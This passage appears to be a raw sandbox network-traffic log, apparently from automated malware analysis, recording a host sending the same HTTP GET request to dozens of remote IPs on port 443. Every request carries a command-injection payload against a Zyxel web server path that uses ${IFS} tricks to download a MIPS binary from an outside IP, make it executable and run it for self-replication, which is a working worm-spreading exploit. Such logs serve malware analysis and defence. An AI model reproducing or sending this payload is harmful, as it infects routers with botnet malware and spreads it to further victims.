                                            Jan 14, 2024 15:50:16.128469944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            48192.168.2.2346864135.229.104.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128499985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            49192.168.2.23533308.98.219.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128504992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            50192.168.2.2359740204.199.229.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128577948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            51192.168.2.2356208165.17.210.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128597975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            52192.168.2.2350508117.243.91.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128650904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            53192.168.2.2353726150.70.62.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128673077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            54192.168.2.234121671.244.205.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128705025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            55192.168.2.2335598168.95.243.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128767967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            56192.168.2.2340482150.200.101.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128772020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            57192.168.2.2347878111.89.114.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128787041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            58192.168.2.235160038.96.146.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128837109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            59192.168.2.2358144131.50.216.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128885984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            60192.168.2.2360810154.254.178.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128921986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            61192.168.2.2351658106.39.161.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128963947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            62192.168.2.2343988155.115.93.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129025936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            63192.168.2.2346382143.23.4.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129029036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            64192.168.2.235041459.91.117.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129086018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            65192.168.2.2341248167.214.210.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129101038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            66192.168.2.2335392223.176.173.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129127026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            67192.168.2.2336164104.9.122.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129190922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            68192.168.2.234833666.220.120.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129226923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            69192.168.2.234191237.209.150.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129254103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            70192.168.2.235777884.4.131.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129278898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            71192.168.2.235665294.153.22.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129312992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            72192.168.2.2357782124.201.203.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129324913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            73192.168.2.233630077.226.207.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129354954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            74192.168.2.2348530174.78.21.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129431963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            75192.168.2.2350108191.13.59.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129442930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            76192.168.2.235343687.218.99.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129503965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            77192.168.2.234043279.214.168.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129563093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            78192.168.2.2348026190.5.221.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129591942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            79192.168.2.2360264120.240.229.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129626989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            80192.168.2.2358392105.199.84.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129671097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            81192.168.2.2333254209.132.192.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129674911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            82192.168.2.2346808181.225.184.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129714966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            83192.168.2.233976445.91.0.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129754066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            84192.168.2.2352566118.51.237.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129764080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            85192.168.2.2335568194.138.117.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129843950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            86192.168.2.2334538145.78.119.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129883051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            87192.168.2.235249631.34.31.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129899025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            88192.168.2.23463205.49.48.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129935026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            89192.168.2.2347444128.19.67.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129968882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            90192.168.2.233475654.198.253.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.129985094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            91192.168.2.2342516168.66.6.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130027056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            92192.168.2.233421227.240.166.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130069017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            93192.168.2.2351408167.179.17.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130070925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            94192.168.2.2342322137.115.131.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130146980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            95192.168.2.23404668.23.157.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130177021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            96192.168.2.2335896204.56.38.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130206108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            97192.168.2.234286848.169.200.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130233049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            98192.168.2.2352382197.160.60.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130249023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            99192.168.2.236006654.255.172.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130321980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            100192.168.2.233483895.118.148.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130362988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            101192.168.2.2358450138.99.98.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130363941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            102192.168.2.235815098.85.18.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130388975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            103192.168.2.2356076180.187.8.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130405903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            104192.168.2.2348580125.20.82.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130465984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            105192.168.2.23550081.97.157.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130503893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            106192.168.2.233971675.239.197.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130510092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            107192.168.2.2354542154.254.237.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130542040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            108192.168.2.2332978132.21.18.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130554914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            109192.168.2.234441236.97.147.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130614996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            110192.168.2.2343184194.97.125.40443
                                            TimestampBytes transferredDirectionData
